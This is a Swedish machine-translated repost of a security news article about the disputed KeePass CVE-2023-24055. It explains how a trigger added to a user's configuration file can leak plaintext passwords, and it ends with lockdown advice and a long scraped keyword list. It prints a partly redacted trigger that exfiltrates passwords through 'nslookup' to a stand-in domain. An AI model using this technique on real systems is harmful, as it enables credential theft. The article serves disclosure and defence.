Det har varit några nyhetsvärde veckor för lösenordshanterare – de där praktiska verktygen som hjälper dig att komma på ett annat lösenord för varje webbplats du använder och sedan hålla reda på dem alla.
I slutet av 2022 var det LastPass sin tur att vara med i nyheterna, när företaget till slut erkände att ett intrång som det drabbades av redan i augusti 2022 verkligen slutade med kundernas lösenord valv blir stulna från molntjänsten där de säkerhetskopierades.
(Lösenorden i sig stals inte, eftersom valven var krypterade och LastPass hade inte kopior av någons "huvudnyckel" för säkerhetskopieringsvalvets filer, men det var en närmare rakning än de flesta var glada över att höra.)
Sedan var det LifeLocks tur att vara med i nyheterna, när företaget varnade för vad som såg ut som ett utslag av lösenordsgissningsattacker, förmodligen baserat på lösenord som stulits från en helt annan webbplats, möjligen för en tid sedan, och kanske köpts på den mörka webben nyligen.
LifeLock självt hade inte brutits, men några av dess användare hade, tack vare lösenordsdelningsbeteende orsakat av risker som de kanske inte ens kom ihåg att de hade tagit.
Konkurrenterna 1Password och BitWarden har också varit i nyheterna nyligen, baserat på rapporter om skadliga annonser, uppenbarligen omedvetet utsända av Google, som på ett övertygande sätt lockade användare att kopiera inloggningssidor som syftar till att nätfiska deras kontouppgifter.
Nu är det KeePass tur att vara det på nyheterna, den här gången för ännu en cybersäkerhetsfråga: en påstådd sårbarhet, jargongtermen som används för programvarubuggar som leder till cybersäkerhetshål som angripare kanske kan utnyttja i onda syften.
Lösenordssniffning på ett enkelt sätt
Vi hänvisar till det som en sårbarhet här eftersom den har en officiell buggidentifierare, utfärdad av US National Institute for Standards and Technology.
Felet har dubbats CVE-2023-24055: Angripare som har skrivbehörighet till XML-konfigurationsfilen [kan] få klartextlösenorden genom att lägga till en exportutlösare.
Påståendet om att kunna få klartextlösenord är tyvärr sant.
Om jag har skrivåtkomst till dina personliga filer, inklusive dina sk %APPDATA%
katalogen kan jag smygt justera konfigurationsavsnittet för att ändra alla KeePass-inställningar som du redan har anpassat, eller för att lägga till anpassningar om du inte medvetet har ändrat något...
...och jag kan förvånansvärt enkelt stjäla dina klartextlösenord, antingen i bulk, till exempel genom att dumpa hela databasen som en okrypterad CSV-fil, eller när du använder dem, till exempel genom att sätta en "programhook" som triggar varje gång du kommer åt en lösenord från databasen.
Observera att jag inte behöver Administratör privilegier, eftersom jag inte behöver bråka med den faktiska installationskatalogen där KeePass-appen lagras, vilket vanligtvis är förbjudet för vanliga användare
Och jag behöver inte åtkomst till några låsta globala konfigurationsinställningar.
Intressant nog gör KeePass allt för att förhindra att dina lösenord sniffas ut när du använder dem, inklusive att använda manipuleringsskyddstekniker för att stoppa olika anti-keylogger-trick även från användare som redan har sysadmin-befogenheter.
Men KeePass-mjukvaran gör det också förvånansvärt enkelt att fånga lösenordsdata i klartext, kanske på sätt som du kanske anser vara "för lätt", även för icke-administratörer.
Det var en minuts arbete att använda KeePass GUI för att skapa en Trigger händelse som körs varje gång du kopierar ett lösenord till urklipp, och för att ställa in den händelsen att göra en DNS-sökning som inkluderade både användarnamnet och klartextlösenordet i fråga:
Vi kunde sedan kopiera den inte så hemskt uppenbara XML-inställningen för det alternativet från vår egen lokala konfigurationsfil till konfigurationsfilen för en annan användare på systemet, varefter de också skulle finna att deras lösenord läckte över internet via DNS-uppslagningar.
Även om XML-konfigurationsdata till stor del är läsbara och informativa, använder KeePass nyfiket slumpmässiga datasträngar som kallas GUID (förkortning av globalt unika identifierare) för att beteckna de olika Trigger inställningar, så att även en välinformerad användare skulle behöva en omfattande referenslista för att förstå vilka utlösare som är inställda och hur.
Så här ser vår DNS-läckande utlösare ut, även om vi har redigerat några av detaljerna så att du inte kan komma till något omedelbart bus bara genom att kopiera och klistra in den här texten direkt:
XXXXXXXXXXXXXXXXXXXXX Kopiera Stjäla saker via DNS-uppslagningar XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXXX.blah.test Sann 1
När den här utlösaren är aktiv orsakar åtkomst av ett KeePass-lösenord att klartexten läcker ut i en diskret DNS-uppslagning till en domän som jag väljer, vilket är blah.test
i detta exempel.
Observera att verkliga angripare nästan säkert skulle förvränga eller fördunkla den stulna texten, vilket inte bara skulle göra det svårare att upptäcka när DNS-läckor inträffade, utan också ta hand om lösenord som innehåller icke-ASCII-tecken, som bokstäver med accent eller emojis, som annars inte kan användas i DNS-namn:
Men är det verkligen en bugg?
Den svåra frågan är dock "Är det här verkligen en bugg, eller är det bara en kraftfull funktion som kan missbrukas av någon som redan skulle behöva minst lika mycket kontroll över dina privata filer som du själv har?"
Enkelt uttryckt, är det en sårbarhet om någon som redan har kontroll över ditt konto kan bråka med filer som ditt konto ändå ska kunna komma åt?
Även om du kanske hoppas att en pssword-hanterare skulle inkludera massor av extra lager av manipuleringsskydd för att göra det svårare för buggar/funktioner av detta slag att missbrukas, bör du CVE-2023-24055 verkligen vara en CVE-listad sårbarhet?
Om så är fallet, skulle inte kommandon som t.ex DEL
(ta bort en fil) och FORMAT
måste det också vara "buggar"?
Och skulle inte själva existensen av PowerShell, som gör potentiellt farligt beteende mycket lättare att provocera (försök powerhsell get-clipboard
till exempel), vara en egen sårbarhet?
Det är KeePass ståndpunkt, bekräftad av följande text som har lagts till i "bugg" detalj på NIST:s hemsida:
** DISPUTED ** […] NOTERA: säljarens ståndpunkt är att lösenordsdatabasen inte är avsedd att vara säker mot en angripare som har den nivån av åtkomst till den lokala PC:n.
Vad göra?
Om du är en fristående KeePass-användare kan du leta efter oseriösa utlösare som "DNS Stealer" som vi skapade ovan genom att öppna KeePass-appen och läsa verktyg > Utlösare... fönster:
Observera att du kan vända hela Trigger system av från det här fönstret, helt enkelt genom att avmarkera [ ] Enable trigger system
alternativ…
…men det är inte en global inställning, så den kan slås på igen via din lokala konfigurationsfil och skyddar dig därför bara från misstag, snarare än från en angripare med åtkomst till ditt konto.
Du kan tvinga inaktivera alternativet för alla på datorn, utan möjlighet för dem att aktivera det igen, genom att ändra den globala "lockdown"-filen KeePass.config.enforced.XML
, som finns i katalogen där själva appprogrammet är installerat.
Utlösare kommer att tvingas av för alla om din globala XML-tillämpningsfil ser ut så här:
falsk
(Om du undrar, skulle en angripare som har skrivåtkomst till applikationskatalogen för att vända den här förändringen nästan säkert ha tillräckligt med kraft på systemnivå för att modifiera själva KeePass körbara filen, eller för att installera och aktivera en fristående keylogger ändå.)
Om du är en nätverksadministratör med uppgift att låsa KeePass på dina användares datorer så att det fortfarande är tillräckligt flexibelt för att hjälpa dem, men inte tillräckligt flexibelt för att de ska kunna hjälpa cyberbrottslingar av misstag, rekommenderar vi att du läser igenom KeePass Säkerhetsproblem sida, triggers sida och Påtvingad konfiguration sida.
- SEO-drivet innehåll och PR-distribution. Bli förstärkt idag.
- Platoblockchain. Web3 Metaverse Intelligence. Kunskap förstärkt. Tillgång här.
- Källa: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Able
- Om Oss
- ovan
- Absolut
- tillgång
- åtkomst
- Konto
- aktiv
- lagt till
- medgav
- annonser
- Efter
- mot
- Alla
- påstådda
- redan
- och
- Annan
- app
- Ansökan
- AUGUSTI
- Författaren
- bil
- tillbaka
- dragen tillbaka
- bakgrund-bild
- säkerhetskopiering
- baserat
- därför att
- Där vi får lov att vara utan att konstant prestera,
- gränsen
- Botten
- brott
- Bug
- fel
- fånga
- vilken
- Vid
- orsakas
- Orsakerna
- Centrum
- säkerligen
- byta
- tecken
- ta
- val
- patentkrav
- närmare
- cloud
- färg
- komma
- företag
- fullständigt
- dator
- datorer
- villkor
- konfiguration
- Tänk
- kontroll
- kopior
- kunde
- täcka
- skapa
- skapas
- CVE
- nätbrottslingar
- Cybersäkerhet
- Dangerous
- mörkt
- mörk Web
- datum
- Databas
- detaljer
- DID
- olika
- direkt
- Visa
- dns
- domän
- inte
- ner
- dubbade
- lättare
- lätt
- antingen
- krypterad
- tillämpning
- tillräckligt
- Hela
- Även
- händelse
- Varje
- alla
- exempel
- Exploit
- export
- omfattande
- extra
- Leverans
- få
- Fil
- Filer
- Slutligen
- hitta
- flexibel
- efter
- kraft
- hittade
- från
- skaffa sig
- få
- Välgörenhet
- Går
- praktisk
- lyckligt
- har
- höjd
- hjälpa
- här.
- Hål
- hoppas
- hovring
- Hur ser din drömresa ut
- Men
- html
- HTTPS
- identifierare
- omedelbar
- in
- innefattar
- ingår
- Inklusive
- informativ
- installera
- exempel
- Institute
- Internet
- fråga
- Utfärdad
- IT
- sig
- jargong
- Ha kvar
- känd
- till stor del
- Lastpass
- skikt
- leda
- läckage
- Läckor
- Nivå
- Lista
- lokal
- såg
- UTSEENDE
- slå upp
- gjord
- göra
- GÖR
- chef
- chefer
- Marginal
- max-bredd
- kanske
- misstag
- misstag
- modifiera
- mest
- namn
- nationell
- Behöver
- nät
- nyheter
- NIST
- normala
- få
- tjänsteman
- öppning
- Alternativet
- annat
- egen
- parameter
- Lösenord
- lösenord
- paul
- PC
- Personer
- kanske
- personlig
- Nätfiske
- Oformatterad text
- plato
- Platon Data Intelligence
- PlatonData
- placera
- inlägg
- potentiellt
- kraft
- den mäktigaste
- befogenheter
- Power
- privat
- privilegier
- förmodligen
- Program
- köpt
- syfte
- sätta
- fråga
- slumpmässig
- utslag
- Läsning
- nyligen
- rekommenderar
- regelbunden
- ihåg
- svara
- Rapporterad
- Rapport
- vända
- risker
- Körning
- §
- säkra
- känsla
- service
- in
- inställning
- inställningar
- Kort
- skall
- helt enkelt
- So
- Mjukvara
- fast
- några
- någon
- Spot
- fristående
- standarder
- Fortfarande
- stulna
- Sluta
- lagras
- sådana
- förment
- SVG
- system
- Ta
- tekniker
- Teknologi
- Smakämnen
- deras
- sig själva
- därför
- Genom
- tid
- till
- alltför
- topp
- spår
- övergång
- transparent
- utlösa
- sann
- SVÄNG
- vände
- typiskt
- unika
- URL
- us
- användning
- Användare
- användare
- verktyg
- olika
- Valv
- valv
- via
- sårbarhet
- W3
- sätt
- webb
- Webbplats
- veckor
- Vad
- som
- VEM
- kommer
- undrar
- Arbete
- skulle
- skriva
- XML
- Din
- själv
- zephyrnet